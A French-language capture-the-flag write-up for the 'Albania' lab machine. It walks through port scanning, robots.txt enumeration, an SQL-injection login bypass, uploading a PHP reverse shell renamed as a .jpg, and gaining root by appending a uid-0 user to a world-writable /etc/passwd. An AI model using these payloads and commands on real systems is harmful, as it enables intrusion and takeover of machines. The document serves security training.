Outils pour utilisateurs
Albania - Write Up
Reconnaissance
nmap -sS -A 192.168.43.198 Deux ports ouverts : 8008 => un web 22 => openssh
Exploitation Web
Dans le fichier robots.txt on a :
- robots.txt
Disallow: /rkfpuzrahngvat/ Disallow: /slgqvasbiohwbu/ Disallow: /tmhrwbtcjpixcv/ Disallow: /vojtydvelrkzex/ Disallow: /wpkuzewfmslafy/ Disallow: /xqlvafxgntmbgz/ Disallow: /yrmwbgyhouncha/ Disallow: /zsnxchzipvodib/ Disallow: /atoydiajqwpejc/ Disallow: /bupzejbkrxqfkd/ Disallow: /cvqafkclsyrgle/ Disallow: /unisxcudkqjydw/ Disallow: /dwrbgldmtzshmf/ Disallow: /exschmenuating/ Disallow: /fytdinfovbujoh/ Disallow: /gzuejogpwcvkpi/ Disallow: /havfkphqxdwlqj/ Disallow: /ibwglqiryexmrk/ Disallow: /jcxhmrjszfynsl/ Disallow: /kdyinsktagzotm/ Disallow: /lezjotlubhapun/ Disallow: /mfakpumvcibqvo/ Disallow: /ngblqvnwdjcrwp/ Disallow: /ohcmrwoxekdsxq/ Disallow: /pidnsxpyfletyr/ Disallow: /qjeotyqzgmfuzs/
On retrouve la même image dans tous les dossiers :
La phrase :
a eshte kjo direktoria e duhur apo po harxhoj kohen kot
Joliment traduit de l'albanais donne :
Est-ce un répertoire approprié ou sont Jerk
Ça nous aide pas bien plus.
Seul un dossier nous renvoie une information différente :
http://192.168.43.198:8008/unisxcudkqjydw/
IS there any /vulnbank/ in there ???
On test le dossier vulnbank :
http://192.168.43.198:8008/unisxcudkqjydw/vulnbank/ Dedans un dossier client qui contient un login.php http://192.168.43.198:8008/unisxcudkqjydw/vulnbank/client/login.php
Nous obtenons ce-ci :
Nous tentons de détecter les erreurs sur l'authentification :
username=a'#&password=admin
Une erreur SQL est retourné :
Nous bypassons l'authentification grâce aux identifiants suivant :
username=a' || 1=1#&password=admin
Gagné :
Dans le ticket on peux uploader un fichier jpg
On va uploader un php-reverse-shell.
Pour cela il faut renommer notre fichier de php-reverse-shell.php en php-reverse-shell.php.jpg.
mv php-reverse-shell.php php-reverse-shell.php.jpg
On ouvre un netcat en local en écoute sur le port 1234 :
nc -lvp 1234
Il suffit d'aller consulter notre ticket pour déclencher le contenu de notre reverse-shell-php.
On va tout d'abord obtenir un pty :
script /tmp/test -c /bin/bash
Exploitation système & Élévation de privilège
On affiche le contenu du fichier /var/www/html/unisxcudkqjydw/vulnbank/client/config.php
- config.php
$db_host = "127.0.0.1"; $db_name = "bank_database"; $db_user = "root"; $db_password = "NuCiGoGo321";
En cherchant un peu on trouve un problème de droit sur le /etc/passwd
Celui-ci autorise l'écriture par tous.
ls -lash /etc/passwd -rw-r--rw- 1 root root 1.7K Nov 23 14:46 /etc/passwd
On va générer un mot de passe que l'on connaît pour l'insérer dans le /etc/passwd :
openssl passwd -1 Password: <= test Verifying - Password: $1$VbI7ntUd$eDTm1LmJpKATPXCHNlx2g.
On l'insère à la fin de notre /etc/passwd :
echo 'ark:$1$VbI7ntUd$eDTm1LmJpKATPXCHNlx2g.:0:0:root:/root:/bin/bash' >> /etc/passwd
id uid=0(root) gid=0(root) groups=0(root)
On récupère le flag:
root@hackday:~# cat flag.txt cat flag.txt Urime, Tani nis raportin! d5ed38fdbf28bc4e58be142cf5a17cf5
Merci à l'auteur de la machine.
Outils de la page
